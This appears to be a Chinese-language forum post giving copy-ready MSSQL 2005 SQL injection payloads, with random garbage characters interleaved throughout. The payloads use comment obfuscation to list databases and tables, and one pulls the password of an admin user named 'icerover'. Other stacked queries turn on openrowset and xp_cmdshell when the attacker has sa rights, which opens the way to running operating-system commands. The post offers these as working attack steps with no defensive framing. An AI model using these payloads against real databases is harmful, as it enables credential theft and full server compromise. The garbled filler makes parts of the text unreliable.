' a X, J# E8 ?, _
( [9 ^- ?2 u- N# u
. S3 |2 z( d6 y: F[Copy to clipboard]CODE:
( A8 X8 Y1 r, g: P. X3 B/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--) x. b; i) I- M' b( s
9 C5 ~3 G4 _4 F7 e; x! \0 a爆表语句,somedb部份是所要列的数据库,红色数字1累加
$ {$ F2 A' k- |5 P3 k9 o' m7 p8 s; n+ a2 K* j1 |
3 z$ x/ @- i$ }/ Y, o+ l& F[Copy to clipboard]CODE:0 h. u9 |1 z: K v- z+ e9 N' H8 [
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--+ H1 }* Z+ U8 r; S3 \' p
- H7 z1 Y( E% Q; }& R2 U) u爆字段语句,爆表admin里user='icerover'的密码段* j8 T% k) s7 K" U+ n9 v4 m
: G$ J# r: e: i. C& @8 Q) ^1 [) \, q
6 J# F& A' z$ T' S2 ^/ X[Copy to clipboard]CODE:$ G H8 s' r4 Y9 [6 Y
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--+ s1 {7 N9 E( M ^6 n+ U; Q
* c" z; j0 I# ?8 N
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
9 U6 U: y( y1 s% n* @如果是sa权限,可以这样来开启1 Y( {, ], _/ @
开启openrowset6 ?# t& o' ]# C3 v* U
8 g, J* y% S$ P
3 W! n& b: p4 r. y8 U8 u[Copy to clipboard]CODE:
+ [7 r. H1 s* ]# r/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
' J) g! k/ e; C9 }$ j/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--. j& {4 O8 V8 Q) ~+ S. `2 A6 }
$ z' K* `1 \, ~" Y' r8 f
开启xp_cmdshell
# N' p# r3 y- T5 A* H2 S
5 H* d& ]. x; i# e5 B2 l9 F$ U2 Q0 ^& z8 g7 B( e& J
[Copy to clipboard]CODE:: j1 U' _) e2 i9 v& x$ V3 x
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
' _( K% g! L& A$ f* u4 l, aEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--* V+ ?# f8 }- }, _3 h
, B' @9 S4 s* I5 v/ `1 Z4 mok,over~~晚安2 M- B9 Q/ H& n. j; k
|